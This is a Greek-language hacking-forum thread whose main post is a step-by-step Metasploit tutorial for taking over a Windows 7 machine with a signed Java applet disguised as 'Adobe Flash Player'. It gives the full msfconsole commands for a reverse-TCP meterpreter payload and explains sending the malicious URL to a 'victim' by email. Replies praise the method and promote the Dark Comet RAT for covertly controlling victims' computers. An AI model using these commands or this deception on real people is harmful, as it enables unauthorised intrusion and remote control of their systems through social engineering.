Hacking Windows 7 SP 1 χρησιμοποιόντας την Java Signed Applet Social Engineering Code Execution

Type : Tutorial
Level : Easy, Medium, Advanced
Success rate : Excellent

Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(I'm recommend using Linux OS or Backtrack 5

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|

Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί -->http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του......... Smile

[ΗMS]Gludiator Wink

afto den ginete kai sto cmd?

kostaskiller έγραψε:: afto den ginete kai sto cmd?

oxi de ginetai... sto sigkekrimeno post milaw gia to backtrack kai oi sigkekrimenes entoles aforane to msfconsole (ergaleio pou periexei i dianomi backtrack 5 r1 twn linux)... Me to cmd twn windows den exw asxolithei se auto to thema...pantos to sigouro einai oti me to cmd de mporeis na kaneis polla...an thes na asxolitheis me penetration test tote kalitera sou proteinw na egkatastiseis ston ipologisti kapoia dianomi twn linux pou exei na kanei me penetration test kai sigkekrimena i kaliteri dianomi gi auto to thema einai to backtrack 5 r1... oson afora gia to cmd an iparxei kapoios apo to forum pou kserei tropo pou na ginetai sto cmd as ton anaferei..alla kai pali eimai sxedon sigouros oti den iparxei... to cmd den einai gia penetration test....

Μπράβο [HMS]Gludiator καλό ποστ και πολύ χρήσιμο ήθελα να το χρησιμοποιήσω αυτό αλλά δεν ήξερα πως Razz

Επίσης υπάρχει και κάτι αντίστοιχο για τα windows το RAΤ και συγκεκριμένα Dark Comet αποκτάς πλήρη πρόσβαση στον υπολογιστή του θύματος σου και κάνεις ότι θες χωρίς να το καταλάβει Razz

θα βάλω κάποια στιγμή tutorial και θα το δείτε Wink

[HMS]T3RM1N2T0R έγραψε:: Μπράβο [HMS]Gludiator καλό ποστ και πολύ χρήσιμο ήθελα να το χρησιμοποιήσω αυτό αλλά δεν ήξερα πως Επίσης υπάρχει και κάτι αντίστοιχο για τα windows το RAΤ και συγκεκριμένα Dark Comet αποκτάς πλήρη πρόσβαση στον υπολογιστή του θύματος σου και κάνεις ότι θες χωρίς να το καταλάβει θα βάλω κάποια στιγμή tutorial και θα το δείτε

oraios term Wink

thanks gia to sxolio Wink

oso gia to RAT nai einai enas arketa kalos tropos Wink

autes tis meres to exw kata nou na arxisw tin ekmathisi tou RAT Wink

))))))))))))))))))))))) ennoeitai pws prepei na to valeis se post na mas to deikseis Wink

aksizei!

etsi paidia o kathenas oti kserei to kanei post sto forum kai etsi sinexws oloi mathainoume kainourgia pramata kai simplironoume tis gnoseis.. sinexiste etsi o kathenas oti kserei to postarei Wink

» All the CMD commands! for Windows only!
» Download Windows 8
» kade ta windows 7 sas se Mac OS X (emfanisiaka)
» Xeklidoste Ton Krifo Logariasmo Tou Diaxiristi Sta Windows 7 kai Vista
» BackTrack 5 R1 --> Exploiting Windows Machine με χρήση (ms08_067_netapi) exploit